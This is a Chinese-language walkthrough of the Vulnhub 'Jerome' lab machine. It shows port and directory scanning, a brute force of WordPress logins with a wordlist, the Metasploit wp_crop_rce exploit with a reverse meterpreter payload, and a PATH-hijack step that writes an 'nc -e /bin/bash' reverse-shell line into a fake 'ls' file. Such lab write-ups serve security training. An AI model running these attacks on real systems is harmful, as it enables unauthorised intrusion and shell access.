nmap 扫描探测:

╰─ nmap -p1-65535 -sV -A -O -sT
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-31 10:15 CST
Nmap scan report for
Host is up (0.00091s latency).
Not shown: 65534 closed ports
8080/tcp open http-proxy Squid http proxy 3.5.27
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: squid/3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 00:0C:29:75:E4:B1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。



╰─ searchsploit squid

Jerome: Vulnhub Walkthrough Safe 第1张


此示例的squid的版本为:<p>Generated Wed, 31 Jul 2019 02:34:31 GMT by jerome (squid/3.5.27)</p>



Jerome: Vulnhub Walkthrough Safe 第2张


╰─ dirb -p

---- Scanning URL: ----
+ (CODE:200|SIZE:19)
+ (CODE:200|SIZE:4021)



Jerome: Vulnhub Walkthrough Safe 第3张

1337端口开放 看到是wp的程序,进行目录枚举一下

╰─ dirb -p


╰─ wpscan -u --proxy -e u vp 

[!] The WordPress '' file exists exposing a version number
[+] Interesting header: LINK: <http://localhost:1337/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.29 (Ubuntu)
[+] Interesting header: VIA: 1.1 jerome (squid/3.5.27)
[+] Interesting header: X-CACHE: MISS from jerome
[+] Interesting header: X-CACHE-LOOKUP: HIT from jerome:8080
[+] XML-RPC Interface available under:
[!] Upload directory has directory listing enabled:
[!] Includes directory has directory listing enabled:

[+] WordPress version 5.0 (Released on 2018-12-06) identified from links opml, meta generator
[!] 9 vulnerabilities identified from the version number


[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
| Id | Login | Name |
| 1 | root | root |
| 4 | jerome | jerome |

[+] Finished: Wed Jul 31 14:39:16 2019
[+] Requests Done: 644
[+] Memory used: 38.043 MB
[+] Elapsed time: 00:00:04


╰─ wpscan -u --proxy -e u --wordlist /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt

Jerome: Vulnhub Walkthrough Safe 第4张

login: jerome and password: jerome


Jerome: Vulnhub Walkthrough Safe 第5张

尝试上传.php3 .php5 .php.xxx .php%00.jpg 未果


[!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
Reference: https://wpvulndb.com/vulnerabilities/9222
Reference: https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
Reference: https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
[i] Fixed in: 5.0.1


Jerome: Vulnhub Walkthrough Safe 第6张

# apt update; apt install metasploit-framework

msf5 > use exploit/multi/http/wp_crop_rce

msf5 exploit(multi/http/wp_crop_rce) > show options

Module options (exploit/multi/http/wp_crop_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http: no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 WordPress

Jerome: Vulnhub Walkthrough Safe 第7张

Jerome: Vulnhub Walkthrough Safe 第8张



Jerome: Vulnhub Walkthrough Safe 第9张


Jerome: Vulnhub Walkthrough Safe 第10张


jerome@jerome:/var/www/html/wordpress$ cd /home/jerome
cd /home/jerome
jerome@jerome:/home/jerome$ echo "nc -e /bin/bash 1234" >> ls
echo "nc -e /bin/bash 1234" >> ls
jerome@jerome:/home/jerome$ chmod 777 ls


Jerome: Vulnhub Walkthrough Safe 第11张


拒绝背锅 运筹帷幄